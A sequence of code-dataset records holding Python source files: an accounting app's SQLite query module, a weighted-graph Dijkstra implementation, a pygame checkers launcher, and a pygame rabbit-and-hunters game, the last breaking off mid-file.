FROM'\n ' bank'\n ' LEFT JOIN'\n ' ('\n ' SELECT'\n ' bank_id_fk,'\n ' round('\n ' sum('\n ' IFNULL(trans_value_net, 0) + '\n ' IFNULL(trans_value_vat, 0) '\n ' ), '\n ' 2 ) as \"bank_balance\"'\n ' FROM'\n ' transactions'\n ' GROUP BY'\n ' bank_id_fk'\n ' ) as trans on trans.bank_id_fk = bank.bank_id'\n ' LEFT JOIN'\n ' ('\n ' SELECT'\n ' org_id_fk,'\n ' count(bank_id) as bank_count'\n ' FROM'\n ' bank'\n ' GROUP BY'\n ' org_id_fk'\n ' ) as bank_count on bank_count.org_id_fk = bank.org_id_fk'\n ' WHERE'\n ' bank.org_id_fk = ?'\n ' GROUP BY'\n ' bank_id',\n (\n session['current_org'],\n )\n ).fetchall()\n\n return accounts\n\n\ndef create_bank_account(form_data, org_id):\n db = get_db()\n\n bank_id = str(uuid4())\n\n if org_id == '':\n org_id = session['current_org']\n\n db.execute(\n 'INSERT INTO bank ('\n ' bank_id,'\n ' 
bank_name,'\n ' bank_reference,'\n ' bank_created_date,'\n ' bank_enabled_flag,'\n ' bank_currency_code,'\n ' org_id_fk'\n ' ) VALUES ('\n ' ?,'\n ' ?,'\n ' ?,'\n ' ?,'\n ' ?,'\n ' ?,'\n ' ?'\n ' )',\n (\n bank_id,\n form_data['bank_name'],\n form_data['bank_reference'],\n datetime.datetime.now().strftime('%Y-%m-%d'),\n form_data['bank_enabled_flag'],\n form_data['bank_currency_code'],\n org_id,\n )\n )\n\n vat_type = db.execute(\n 'SELECT vat_type_id'\n ' FROM'\n ' vat_type'\n ' WHERE'\n ' vat_type_name = \"Out of Scope\"'\n ).fetchone()\n\n db.commit()\n\n o_bal = {\n 'trans_date': form_data['open_date'],\n 'trans_desc': 'Opening Balance',\n 'trans_value_net': form_data['open_balance'],\n 'trans_value_vat': 0.00,\n 'sign': 1,\n 'org_id_fk': org_id,\n 'trans_created_date': datetime.datetime.now().strftime('%Y-%m-%d'),\n 'bank_id': bank_id,\n 'cat_id': '',\n 'vat_type_id_fk': vat_type['vat_type_id']\n }\n\n create_transaction(o_bal)\n\n return bank_id\n\n\ndef create_transaction(trans_data):\n db = get_db()\n\n if 'trans_value_vat' not in trans_data:\n vat_value = 0\n vat_type_id_fk = ''\n else:\n vat_value = trans_data['trans_value_vat']\n vat_type_id_fk = trans_data['vat_type_id_fk']\n\n db.execute(\n 'INSERT INTO transactions ('\n ' trans_id,'\n ' trans_post_date,'\n ' trans_created_date,'\n ' trans_value_net,'\n ' trans_value_vat,'\n ' trans_description,'\n ' user_id_fk,'\n ' org_id_fk,'\n ' bank_id_fk,'\n ' category_id_fk,'\n ' vat_type_id_fk'\n ' ) VALUES ('\n ' ?,'\n ' ?,'\n ' ?,'\n ' ?,'\n ' ?,'\n ' ?,'\n ' ?,'\n ' ?,'\n ' ?,'\n ' ?,'\n ' ?'\n ')',\n (\n str(uuid4()),\n trans_data['trans_date'],\n datetime.datetime.now().strftime('%Y-%m-%d'),\n float(trans_data['trans_value_net']) * float(trans_data['sign']),\n float(vat_value) * float(trans_data['sign']),\n trans_data['trans_desc'],\n session['user_id'],\n session['current_org'],\n trans_data['bank_id'],\n trans_data['cat_id'],\n vat_type_id_fk,\n )\n )\n\n db.commit()\n\ndef get_bank_account(bank_id):\n db = get_db()\n\n account = db.execute(\n 'SELECT'\n ' *'\n ' FROM'\n ' bank'\n ' WHERE'\n ' bank_id = ? and'\n ' org_id_fk = ?',\n (\n bank_id,\n session['org_id'],\n )\n ).fetchone()\n\n return account\n\ndef update_bank_details(bank_data, bank_id):\n db = get_db()\n\n db.execute(\n 'UPDATE'\n ' bank'\n ' SET'\n ' bank_name = ?,'\n ' bank_reference = ?,'\n ' bank_created_date = ?,'\n ' bank_enabled_flag = ?,'\n ' bank_currency_code = ?'\n ' WHERE'\n ' bank_id = ?',\n (\n bank_data['bank_name'],\n bank_data['bank_reference'],\n datetime.datetime.now().strftime('%Y-%m-%d'),\n bank_data['bank_enabled_flag'],\n bank_data['bank_currency_code'],\n bank_id,\n )\n )\n\n db.commit()\n\ndef get_active_categories_for_current_org():\n db = get_db()\n\n categories = db.execute(\n \"SELECT\"\n \" *\"\n \" FROM\"\n \" categories\"\n \" WHERE\"\n \" org_id_fk = ? and\"\n \" category_enabled_flag = 1\",\n (\n session['current_org'],\n )\n ).fetchall()\n\n return categories\n\n\ndef income_chart():\n db = get_db()\n\n from_date = datetime.datetime.now() - datetime.timedelta(days=365)\n from_date = datetime.datetime.strftime(from_date, '%Y-%m-%d')\n\n values = db.execute(\n 'SELECT'\n ' strftime(\"%Y-%m-\", trans_post_date)||\"01\" as period,'\n ' sum(trans_value_net) as value'\n ' FROM'\n ' transactions'\n ' JOIN'\n ' categories on category_id = category_id_fk'\n ' JOIN'\n ' category_type on cat_type_id = cat_type_id_fk'\n ' WHERE'\n ' transactions.org_id_fk=? 
and'\n ' cat_type_name = \"Income\" and'\n ' trans_post_date >= ?'\n ' GROUP BY'\n ' cat_type_name,'\n ' period'\n ' ORDER BY'\n ' period',\n (\n session['current_org'],\n from_date,\n )\n ).fetchall()\n\n return values\n\n\ndef expense_chart():\n db = get_db()\n\n from_date = datetime.datetime.now() - datetime.timedelta(days=365)\n from_date = datetime.datetime.strftime(from_date, '%Y-%m-%d')\n\n values = db.execute(\n 'SELECT'\n ' strftime(\"%Y-%m-\", trans_post_date)||\"01\" as period,'\n ' sum(trans_value_net) as value'\n ' FROM'\n ' transactions'\n ' JOIN'\n ' categories on category_id = category_id_fk'\n ' JOIN'\n ' category_type on cat_type_id = cat_type_id_fk'\n ' WHERE'\n ' transactions.org_id_fk=? and'\n ' cat_type_name = \"Expense\" and'\n ' trans_post_date >= ?'\n ' GROUP BY'\n ' cat_type_name,'\n ' period'\n ' ORDER BY'\n ' period',\n (\n session['current_org'],\n from_date,\n )\n ).fetchall()\n\n return values\n\n\ndef get_vat_codes():\n db = get_db()\n\n vat_codes = db.execute(\n 'SELECT *'\n ' FROM vat_type'\n ).fetchall()\n\n return vat_codes\n\n\ndef create_standard_coa(coa):\n db = get_db()\n\n fixed_asset = db.execute(\n 'SELECT cat_type_id'\n ' FROM category_type'\n ' WHERE cat_type_name = \"Fixed Assets\"'\n ).fetchone()\n\n current_asset = db.execute(\n 'SELECT cat_type_id'\n ' FROM category_type'\n ' WHERE cat_type_name = \"Current Liabilities\"'\n ).fetchone()\n\n current_liability = db.execute(\n 'SELECT cat_type_id'\n ' FROM category_type'\n ' WHERE cat_type_name = \"Current Liabilities\"'\n ).fetchone()\n\n long_term_liability = db.execute(\n 'SELECT cat_type_id'\n ' FROM category_type'\n ' WHERE cat_type_name = \"Long-term Liabilities\"'\n ).fetchone()\n\n income = db.execute(\n 'SELECT cat_type_id'\n ' FROM category_type'\n ' WHERE cat_type_name = \"Income\"'\n ).fetchone()\n\n expense = db.execute(\n 'SELECT cat_type_id'\n ' FROM category_type'\n ' WHERE cat_type_name = \"Expense\"'\n ).fetchone()\n\n equity = db.execute(\n 'SELECT cat_type_id'\n ' FROM category_type'\n ' WHERE cat_type_name = \"Equity\"'\n ).fetchone()\n\n if coa == 'individual':\n fixed_asset_categories = [\n 'House',\n 'Motor vehicles',\n 'Pension'\n ]\n\n for each in fixed_asset_categories:\n category = {\n 'cat_name': each,\n 'active_flag': 1,\n 'type_id': fixed_asset['cat_type_id']\n }\n\n create_category(category)\n\n liability_categories = [\n 'Mortgage'\n ]\n\n for each in liability_categories:\n category = {\n 'cat_name': each,\n 'active_flag': 1,\n 'type_id': long_term_liability['cat_type_id']\n }\n\n create_category(category)\n\n income_categories = [\n 'Salary',\n 'Interest'\n ]\n\n for each in income_categories:\n category = {\n 'cat_name': each,\n 'active_flag': 1,\n 'type_id': income['cat_type_id']\n }\n\n create_category(category)\n\n expense_categories = [\n 'Rent',\n 'Utilities',\n 'Phone',\n 'Internet',\n 'Insurance',\n 'Food',\n 'Holiday',\n 'Socializing',\n 'Other Expenses'\n ]\n\n for each in expense_categories:\n category = {\n 'cat_name': each,\n 'active_flag': 1,\n 'type_id': expense['cat_type_id']\n }\n\n create_category(category)\n\n if coa == 'limited':\n fixed_asset_categories = [\n 'Plant and Machinery',\n 'Motor Vehicles',\n 'Fixtures and Fittings'\n ]\n\n for each in fixed_asset_categories:\n category = {\n 'cat_name': each,\n 'active_flag': 1,\n 'type_id': fixed_asset['cat_type_id']\n }\n\n create_category(category)\n\n asset_categories = [\n 'Debtors',\n 'Stock',\n 'Prepayments'\n ]\n\n for each in asset_categories:\n category = {\n 'cat_name': each,\n 
'active_flag': 1,\n 'type_id': current_asset['cat_type_id']\n }\n\n create_category(category)\n\n current_liability_categories = [\n 'Creditors',\n 'Deferred Income',\n 'Taxes',\n 'Accruals'\n ]\n\n for each in current_liability_categories:\n category = {\n 'cat_name': each,\n 'active_flag': 1,\n 'type_id': current_liability['cat_type_id']\n }\n\n create_category(category)\n\n long_liability_categories = [\n 'Bank Loans',\n 'Directors Loan Account',\n 'Corporation Tax'\n ]\n\n for each in long_liability_categories:\n category = {\n 'cat_name': each,\n 'active_flag': 1,\n 'type_id': long_term_liability['cat_type_id']\n }\n\n create_category(category)\n\n income_categories = [\n 'Sales',\n 'Other Income'\n ]\n\n for each in income_categories:\n category = {\n 'cat_name': each,\n 'active_flag': 1,\n 'type_id': income['cat_type_id']\n }\n\n create_category(category)\n\n expense_categories = [\n 'Cost of Goods Sold',\n 'Rent and Rates',\n 'Utilities',\n 'Wages and Salaries',\n 'Travel Expenses',\n 'IT and Telecomms',\n 'Stationary and Postage',\n 'Professional and Legal Fees',\n 'Other Expenses',\n 'Depreciation',\n 'Tax'\n ]\n\n for each in expense_categories:\n category = {\n 'cat_name': each,\n 'active_flag': 1,\n 'type_id': expense['cat_type_id']\n }\n\n create_category(category)\n\n\n db.commit()\n\n\ndef add_demo_data():\n db = get_db()\n\n org_type = db.execute(\n 'SELECT * FROM organisation_type'\n ' WHERE org_type_name = \"Limited Company\"'\n ).fetchone()\n\n demo_org = {\n \"org_name\": 'Hermes Demo Ltd',\n \"org_enabled_flag\": 1,\n \"org_vat\": \"12 3456 789 GB\",\n \"org_no\": \"12345678\",\n \"org_type\": org_type['org_type_id']\n }\n\n org_id = create_organisation(demo_org)\n\n bank_accounts = [\n {\n 'bank_name': 'Business Bank Account',\n 'bank_reference': 00-00-00-10000001,\n 'bank_enabled_flag': 1,\n 'bank_currency_code': 'gbp',\n 'open_date': datetime.date(2019, 1, 1),\n 'open_balance': round(random.random() * 10000, 2)\n },\n\n {\n 'bank_name': 'Overdrawn Account',\n 'bank_reference': 00 - 00 - 00 - 10000002,\n 'bank_enabled_flag': 1,\n 'bank_currency_code': 'gbp',\n 'open_date': datetime.date(2019, 1, 1),\n 'open_balance': round(random.random() * 1000, 2) * -1\n },\n\n {\n 'bank_name': 'Savings Account',\n 'bank_reference': 00 - 00 - 00 - 10000002,\n 'bank_enabled_flag': 1,\n 'bank_currency_code': 'gbp',\n 'open_date': datetime.date(2019, 1, 1),\n 'open_balance': round(random.random() * 100000, 2)\n }\n\n ]\n\n for bank in bank_accounts:\n bank_id = create_bank_account(bank, org_id)\n\n db.commit()\n\n\ndef get_current_settings():\n db = get_db()\n\n settings = db.execute(\n 'SELECT * FROM settings WHERE user_id_fk = ?',\n (\n session['user_id'],\n )\n ).fetchone()\n\n return settings\n\n\ndef get_current_global_settings():\n db = get_db()\n\n settings = db.execute(\n 'SELECT * FROM global_settings'\n ).fetchone()\n\n return settings\n\n\ndef update_settings(form_data):\n db = get_db()\n\n db.execute(\n 'UPDATE settings'\n ' SET settings_theme = ?'\n ' WHERE user_id_fk = ?',\n (\n form_data['settings_theme'],\n session['user_id'],\n )\n )\n\n db.commit()\n\ndef update_global_settings(form_data):\n db = get_db()\n\n if 'mtd_prod_switch' not in form_data:\n switch_value = 'off'\n else:\n switch_value = form_data['mtd_prod_switch']\n\n db.execute(\n 'UPDATE global_settings'\n ' SET'\n ' mj_api_key = ?,'\n ' mj_api_secret = ?,'\n ' mj_api_from_email = ?,'\n ' companies_house_api_key = ?,'\n ' mtd_client_id = ?,'\n ' mtd_client_secrets = ?,'\n ' mtd_server_token = ?,'\n ' 
mtd_prod_status = ?'\n ' WHERE'\n ' global_id = 1',\n (\n form_data['mj_api_key'],\n form_data['mj_api_secret'],\n form_data['mj_api_from_email'],\n form_data['companies_house_api_key'],\n form_data['mtd_client_id'],\n form_data['mtd_client_secrets'],\n form_data['mtd_server_token'],\n switch_value,\n )\n )\n\n db.commit()\n\n\ndef get_vat_transactions():\n db = get_db()\n\n vat_trans = db.exectute(\n 'SELECT'\n ' sum(trans_value_net),'\n ' sum(trans_value_vat),'\n ' cat_type_name,'\n ' vat_type_id_fk,'\n ' vat_rtn_id_fk'\n ' FROM'\n ' transactions'\n ' JOIN categories on category_id = category_id_fk'\n ' JOIN category_type on cat_type_id = cat_type_id_fk'\n ' WHERE'\n ' transactions.trans_post_date >= ? and'\n ' transactions.trans_post_data <= ?'\n ' group by'\n ' cat_type_name,'\n ' vat_type_id_fk'\n ).fetchall()\n\ndef get_all_contacts():\n db = get_db()\n\n contacts = db.execute(\n 'SELECT'\n ' *'\n ' FROM'\n ' contacts'\n ' WHERE'\n ' org_id_fk = ?',\n (\n session['current_org'],\n )\n ).fetchall()\n\n return contacts\n\ndef create_contact(contact):\n db = get_db()\n\n db.execute(\n 'INSERT INTO contacts ('\n ' contact_id,'\n ' contact_name,'\n ' contact_account_no,'\n ' contact_foreign_account_no,'\n ' contact_vat_registration,'\n ' contact_company_no,'\n ' contact_type,'\n ' contact_email,'\n ' contact_phone,'\n ' contact_main_contact,'\n ' contact_web_address,'\n ' org_id_fk'\n ' ) VALUES ('\n ' ?,'\n ' ?,'\n ' ?,'\n ' ?,'\n ' ?,'\n ' ?,'\n ' ?,'\n ' ?,'\n ' ?,'\n ' ?,'\n ' ?,'\n ' ?'\n ' )',\n (\n str(uuid4()),\n contact['contact_name'],\n contact['contact_account_no'],\n contact['contact_foreign_account_no'],\n contact['contact_vat_registration'],\n contact['contact_company_no'],\n contact['contact_type'],\n contact['contact_email'],\n contact['contact_phone'],\n contact['contact_main_contact'],\n contact['contact_web_address'],\n session['current_org'],\n )\n )\n\n db.commit()","sub_path":"hermes/core_queries.py","file_name":"core_queries.py","file_ext":"py","file_size_in_byte":25121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"211294622","text":"#I should burry this and comeback.\n\nclass weighted_digraph:\n\n class __edge(object):\n\n def __init__(self, to_node, weight):\n\n self.to_node = to_node\n\n self.weight = weight\n\n class __node(object):\n\n def __init__(self, value):\n\n self.value = value\n\n self.edges = []\n\n self.distance = 0\n\n self.because = None\n\n def __str__(self):\n\n result = str(self.value)\n\n for edge in self.edges:\n\n result += \"->\" + str(edge.to_node.value) + \\\n \"(\" + str(edge.weight) + \")\"\n\n return (result)\n\n def add_edge(self, new_edge):\n\n if not self.is_adjacent(new_edge.to_node):\n\n self.edges.append(new_edge)\n\n def remove_edge(self, to_node):\n\n for edge in self.edges:\n\n if edge.to_node == to_node:\n\n self.edges.remove(edge)\n\n def is_adjacent(self, node):\n\n for edge in self.edges:\n\n if edge.to_node == node:\n\n return (True)\n\n return (False)\n\n def __init__(self, directed=True):\n\n self.__nodes = []\n\n self.__directed = directed\n\n def __len__(self):\n\n return (len(self.__nodes))\n\n def __str__(self):\n\n result = \"\"\n\n for node in self.__nodes:\n\n result += str(node) + '\\n'\n\n return (result)\n\n def get_nodes(self):\n\n return self.__nodes[:]\n\n def find(self, value):\n\n for node in self.__nodes:\n\n if node.value == value:\n\n return (node)\n\n return (None)\n\n def add_nodes(self, nodes):\n\n for node in nodes:\n\n 
self.add_node(node)\n\n def add_node(self, value):\n\n if not self.find(value):\n\n self.__nodes.append(self.__node(value))\n\n def add_edges(self, edges):\n\n for edge in edges:\n\n self.add_edge(edge[0], edge[1], edge[2])\n\n def add_edge(self, from_value, to_value, weight):\n\n \"\"\" Add an edge between two values. If the nodes\n for those values aren't already in the graph,\n add those. \"\"\"\n\n from_node = self.find(from_value)\n\n to_node = self.find(to_value)\n\n if not from_node:\n\n self.add_node(from_value)\n\n from_node = self.find(from_value)\n\n if not to_node:\n\n self.add_node(to_value)\n\n to_node = self.find(to_value)\n\n from_node.add_edge(self.__edge(to_node, weight))\n\n if not self.__directed:\n\n to_node.add_edge(self.__edge(from_node, weight))\n\n def remove_edge(self, from_value, to_value, weight):\n\n from_node = self.find(from_value)\n\n to_node = self.find(to_value)\n\n from_node.remove_edge(to_node)\n\n # was self.directed, which does not exist (the attribute is name-mangled)\n if not self.__directed:\n\n to_node.remove_edge(from_node)\n\n def are_adjacent(self, value1, value2):\n\n return (self.find(value1).is_adjacent(self.find(value2)))\n\n def why(self, value, start):\n\n # walk the 'because' back-pointers; returns [distance, value, ..., start]\n snake_tail = []\n\n tail = self.find(value)\n\n snake_tail.append(tail.distance)\n\n while tail.value != start:\n\n snake_tail.append(tail.value)\n\n tail = tail.because\n\n snake_tail.append(start)\n\n return snake_tail\n\n def dijkstra(self, start, track_prev=True):\n\n to_compare = []\n\n for_unit_test = []\n\n will_compare = None\n\n for node in self.__nodes:\n\n node.distance = float('inf')\n\n node.because = None\n\n source = self.find(start)\n\n source.distance = 0\n\n to_compare.append(source)\n\n while to_compare:\n\n compared_with = float('inf')\n\n for node in to_compare:\n\n if node.distance < compared_with:\n\n will_compare = node\n\n compared_with = node.distance\n\n to_compare.remove(will_compare)\n\n for_unit_test.append([will_compare.distance, will_compare.value])\n\n for edge in will_compare.edges:\n\n distance_to_compare = edge.weight + will_compare.distance\n\n if distance_to_compare < edge.to_node.distance:\n\n edge.to_node.distance = distance_to_compare\n\n edge.to_node.because = will_compare\n\n if edge.to_node not in to_compare:\n\n to_compare.append(edge.to_node)\n\n # drop duplicate [distance, value] entries while keeping visit order\n final_list = []\n\n for node in for_unit_test:\n\n if node not in final_list:\n\n final_list.append(node)\n\n if not track_prev:\n\n return final_list\n\n # expand each settled node into the path that produced it\n final_list_how = []\n\n for node in final_list:\n\n final_list_how.append(self.why(node[1], start))\n\n return final_list_how\n\n# quick demo: build a small weighted graph and run dijkstra from 'a'\ngraph = weighted_digraph()\n\ngraph.add_edges([('a', 'b', 1), ('b', 'c', 2), ('a', 'c', 5)])\n\nprint(graph)\n\nprint(graph.dijkstra('a'))\n","sub_path":"Assig5/EX_W_Map.py","file_name":"EX_W_Map.py","file_ext":"py","file_size_in_byte":4924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"}
+{"seq_id":"607670990","text":"# Drawing the board for Checkers\r\nimport pygame\r\n\r\nfrom checkers_stuff.constants import WIDTH, HEIGHT, SQUARE_SIZE\r\nfrom checkers_stuff.game import Game\r\n\r\n# from checkers_stuff.board import Board\r\n\r\nFPS = 60\r\n\r\nWIN = pygame.display.set_mode((WIDTH, HEIGHT))\r\npygame.display.set_caption(\"Checkers\")\r\n\r\n\r\n# this will tell us based on the position of our mouse what square\r\n# row and col it is on\r\n\r\n\r\ndef get_row_col_from_mouse(pos):\r\n # we will get the x, y of our mouse and it will tell us what row and col we're in\r\n x, y = pos\r\n # if square size is 100 and we're trying to figure out what row we're in\r\n # if our y is at 650 then we know we must be in 
row six because 100\r\n # goes into 650 six times\r\n row = y // SQUARE_SIZE\r\n col = x // SQUARE_SIZE\r\n return row, col\r\n\r\n\r\ndef main():\r\n # while run is true we will run this loop\r\n run = True\r\n clock = pygame.time.Clock()\r\n game = Game(WIN)\r\n # it's Game() because that is what the class is named\r\n\r\n # enable to check the board being drawn\r\n # board = Board()\r\n\r\n # checking if piece is deleted, and then redrawn at the specified square\r\n # comment out this piece to see that the function mouse button down works\r\n # piece = board.get_piece(0, 1)\r\n\r\n while run:\r\n clock.tick(FPS)\r\n\r\n if game.winner() != None:\r\n # checking if there's a winner and printing out something when there is a winner\r\n print(game.winner())\r\n\r\n for event in pygame.event.get():\r\n # if the red 'X' is pushed, quit the game\r\n if event.type == pygame.QUIT:\r\n run = False\r\n\r\n if event.type == pygame.MOUSEBUTTONDOWN:\r\n pos = pygame.mouse.get_pos()\r\n row, col = get_row_col_from_mouse(pos)\r\n # commented out so game_logic will do this\r\n # piece = board.get_piece(row, col)\r\n # to show the piece gets moved, comment out for actually functionality\r\n # board.move(piece, 4, 3)\r\n # if game.turn == RED:\r\n game.select(row, col)\r\n\r\n game.update()\r\n\r\n # commented out enabled to test game mechanics\r\n # board.draw(WIN)\r\n # pygame.display.update()\r\n\r\n pygame.quit()\r\n\r\n\r\nmain()\r\n","sub_path":"checkers.py","file_name":"checkers.py","file_ext":"py","file_size_in_byte":2294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"282034237","text":"# Encoding: UTF-8\n# Autor: Oscar Alejandro Torres Maya, A01377686\n# Descripción: Proyecto Final, videojuego\n\nimport pygame #Importa librería de pygame\nfrom random import randint #Importa la función randint de la librería random\n\n#Dimensiones de la pantalla\nANCHO = 800\nALTO = 600\n\n#Colores\nAZUL = (96,111,140)\nROJO = (255, 0, 0)\nNEGRO = (0,0,0)\nVERDE = (76,145,65)\n\n#Estados de juego\nMENU = 1\nJUGANDO = 2\nFINAL = 3\nPUNTAJES = 4\n\n\n#Dibuja al personaje en la pantalla\ndef dibujarPersonaje(ventana, spritePersonaje):\n ventana.blit(spritePersonaje.image, spritePersonaje.rect)\n\n\n#Dibuja a los enemigos en la pantalla\ndef dibujarEnemigos(ventana, listaEnemigos, listaEnemigos2):\n for enemigo in listaEnemigos: # VISITAR O ACCEDER A CADA ELEMENTO\n ventana.blit(enemigo.image, enemigo.rect) # IMAGEN , LUGAR\n\n for enemigo2 in listaEnemigos2: # VISITAR O ACCEDER A CADA ELEMENTO\n ventana.blit(enemigo2.image, enemigo2.rect) # IMAGEN , LUGAR\n\n\n#Dibuja a los árboles en la pantalla\ndef dibujarObstaculo(ventana,spriteObstaculo):\n ventana.blit(spriteObstaculo.image, spriteObstaculo.rect) # IMAGEN , LUGAR\n\n\n#Dibuja el bonus en la pantalla\ndef dibujarBonus(ventana,spriteBonus):\n ventana.blit(spriteBonus.image, spriteBonus.rect) # IMAGEN , LUGAR\n\n\n#Mueve a los enemigos\ndef moverEnemigos(listaEnemigos,listaEnemigos2):\n for enemigo in listaEnemigos: #Mueve a todos los enemigos\n enemigo.rect.left -= 5 #Velocidad del cazador verde por pixel\n\n for enemigo2 in listaEnemigos2: #Mueve a todos los enemigos\n enemigo2.rect.left += 5 #Velocidad del cazador naranja por pixel\n\n\n#Dibuja las opciones del menú\ndef dibujarMenu(ventana, imgBotonJugar, imgBotonSalir, imgHighscore):\n ventana.blit(imgBotonJugar, (ANCHO//2-110, ALTO//3-50))\n ventana.blit(imgBotonSalir, (ANCHO//2-110, ALTO//3+100))\n ventana.blit(imgHighscore, (ANCHO//2-110, ALTO - 
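The get_row_col_from_mouse() helper relies on floor division; a tiny check, assuming SQUARE_SIZE = 100 as in its comment, makes the pixel-to-cell mapping concrete:

SQUARE_SIZE = 100
for y in (0, 99, 100, 650):
    print(y, "->", y // SQUARE_SIZE)  # 0 -> 0, 99 -> 0, 100 -> 1, 650 -> 6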
160))\n\n\n#Verifica si el conejo y cazador chocaron\ndef verificarColision(listaEnemigos, listaEnemigos2, spritePersonaje):\n for cazador in range(len(listaEnemigos)-1, -1, -1):\n enemigo = listaEnemigos[cazador]\n # Conejo vs cazador derecha\n xPersonaje, yPersonaje, anchoPersonaje, altPersonaje = spritePersonaje.rect\n xEnemigo, yEnemigo, anchoEnemigo, altEnemigo = enemigo.rect\n\n #PUNTO INFERIOR Y SUPERIOR IZQUIERDO\n if xPersonaje >= xEnemigo and xPersonaje <= xEnemigo+anchoEnemigo and yPersonaje+altPersonaje >= yEnemigo and yPersonaje <= yEnemigo+altEnemigo:\n listaEnemigos.remove(enemigo) #Colisionaron\n return True\n\n #PUNTO INFERIOR Y SUPERIOR DERECHO\n elif xPersonaje+anchoPersonaje >= xEnemigo and xPersonaje <= xEnemigo+anchoEnemigo and yPersonaje+altPersonaje >= yEnemigo and yPersonaje <= yEnemigo+altEnemigo:\n listaEnemigos.remove(enemigo) #Colisionaron\n return True\n\n for cazador2 in range(len(listaEnemigos2)-1, -1, -1):\n enemigo2 = listaEnemigos2[cazador2]\n # Conejo vs cazador izquierda\n xPersonaje, yPersonaje, anchoPersonaje, altPersonaje = spritePersonaje.rect\n xEnemigo2, yEnemigo2, anchoEnemigo2, altEnemigo2 = enemigo2.rect\n\n # PUNTO INFERIOR Y SUPERIOR IZQUIERDO\n if xPersonaje >= xEnemigo2 and xPersonaje <= xEnemigo2 + anchoEnemigo2 and yPersonaje + altPersonaje >= yEnemigo2 and yPersonaje <= yEnemigo2 + altEnemigo2:\n listaEnemigos2.remove(enemigo2) #Colisionaron\n return True\n\n # PUNTO INFERIOR Y SUPERIOR DERECHO\n elif xPersonaje + anchoPersonaje >= xEnemigo2 and xPersonaje <= xEnemigo2 + anchoEnemigo2 and yPersonaje + altPersonaje >= yEnemigo2 and yPersonaje <= yEnemigo2 + altEnemigo2:\n listaEnemigos2.remove(enemigo2) #Colisionaron\n return True\n\n\n#Dibuja el menú cuando acaba el juego\ndef dibujarMenuFinal(ventana, imgBotonSalir, imgHome, imgIntento2, tiempo):\n ventana.blit(imgHome, (ANCHO - 120, ALTO - 100))\n ventana.blit(imgBotonSalir, (ANCHO // 2 - 110, ALTO//3 + 75))\n ventana.blit(tiempo, (ANCHO//2-250, 100))\n ventana.blit(imgIntento2, (ANCHO-220, ALTO-80))\n\n\n#Verifica si agarró el bonus el usuario\ndef agregarBonus(spriteBonus, spritePersonaje):\n xPersonaje, yPersonaje, anchoPersonaje, altoPersonaje = spritePersonaje.rect\n xBonus, yBonus, anchoBonus, altoBonus = spriteBonus.rect\n #Hace la condición de que agarre el bonus\n if xPersonaje >= xBonus and xPersonaje <= xBonus+anchoBonus and yPersonaje+altoPersonaje >= yBonus and yPersonaje <= yBonus+altoBonus:\n spriteBonus.remove()\n spriteBonus.rect.left = randint(80, ANCHO - 80)\n spriteBonus.rect.bottom = int(randint(0, ALTO) / 100 + 0.5) * 100\n return True\n # Hace la condición de que agarre el bonus\n elif xPersonaje+anchoPersonaje >= xBonus and xPersonaje <= xBonus+anchoBonus and yPersonaje+altoPersonaje >= yBonus and yPersonaje <= yBonus+altoBonus:\n spriteBonus.remove()\n spriteBonus.rect.left = randint(80, ANCHO - 80)\n spriteBonus.rect.bottom = int(randint(0, ALTO) / 100 + 0.5) * 100\n return True\n else:\n pass\n\n\n#Le paso todos los archivos para después utilizarlos\ndef dibujar():\n pygame.init() #Inicializa el motor de pygame\n ventana = pygame.display.set_mode((ANCHO, ALTO)) #Crea la ventana donde dibujará, Crea una ventana de ANCHO x ALTO\n reloj = pygame.time.Clock() #Para limitar los frames por segundo\n termina = False #Condición para que siga el juego, si es True, termina\n\n\n #Carga al personaje\n imgPersonaje = pygame.image.load(\"Conejo.png\")\n spritePersonaje = pygame.sprite.Sprite()\n spritePersonaje.image = imgPersonaje\n spritePersonaje.rect = 
imgPersonaje.get_rect()\n spritePersonaje.rect.left = 340\n spritePersonaje.rect.bottom = 300\n #ALTO//2 + spritePersonaje.rect.height//2\n\n #Carga a los enemigos\n listaEnemigos = []\n imgEnemigo = pygame.image.load(\"CazadorIzquierda.png\")\n for k in range(5): #Genera 5 enemigos\n spriteEnemigo = pygame.sprite.Sprite()\n spriteEnemigo.image = imgEnemigo\n spriteEnemigo.rect = imgEnemigo.get_rect()\n spriteEnemigo.rect.left = randint(0, ANCHO) + ANCHO\n spriteEnemigo.rect.bottom = int(randint(0, ALTO)/100+0.5) * 100\n listaEnemigos.append(spriteEnemigo) #Mete a los enemigos a la lista\n\n listaEnemigos2 = []\n imgEnemigo2 = pygame.image.load(\"CazadorDerecha.png\")\n for i in range(5): #Genera 5 enemigos\n spriteEnemigo2 = pygame.sprite.Sprite()\n spriteEnemigo2.image = imgEnemigo2\n spriteEnemigo2.rect = imgEnemigo2.get_rect()\n spriteEnemigo2.rect.left = randint(0, ANCHO) - ANCHO\n spriteEnemigo2.rect.bottom = int(randint(0, ALTO)/100+0.5) * 100\n listaEnemigos2.append(spriteEnemigo2) #Mete a los enemigos a la lista\n\n\n #Cargar obstáculos\n imgObstaculo = pygame.image.load(\"arbol.png\")\n spriteObstaculo = pygame.sprite.Sprite()\n spriteObstaculo.image = imgObstaculo\n spriteObstaculo.rect = imgObstaculo.get_rect()\n spriteObstaculo.rect.left = randint(70,ANCHO-70)\n spriteObstaculo.rect.bottom = int(randint(80,ALTO-80)/100+0.5) * 100\n\n #Cargar bonus\n imgBonus = pygame.image.load(\"BonoZanahoria.png\")\n spriteBonus = pygame.sprite.Sprite()\n spriteBonus.image = imgBonus\n spriteBonus.rect = imgBonus.get_rect()\n spriteBonus.rect.left = randint(80,ANCHO-80)\n spriteBonus.rect.bottom = int(randint(80,ALTO-80)/100+0.5) * 100\n\n #Fondos\n imgFondoInicio = pygame.image.load(\"imgFondo1.jpg\")\n imgFondoJugando = pygame.image.load(\"imgFondo2.jpg\")\n imgFondoFinal = pygame.image.load(\"imgFondo3.jpg\")\n\n #Menú\n imgBotonJugar = pygame.image.load(\"jugar.png\")\n imgBotonSalir = pygame.image.load(\"salir.png\")\n imgHighscore = pygame.image.load(\"Highscores.png\")\n\n #Menú final\n imgHome = pygame.image.load(\"home.png\")\n imgIntento2 = pygame.image.load(\"intentar.png\")\n\n #Estado incial\n estado = MENU\n\n #Tiempo\n timer = 0 #Acumulador de tiempo de regeneración enemigos\n nuevoTiempo = 0 #Acumulador de 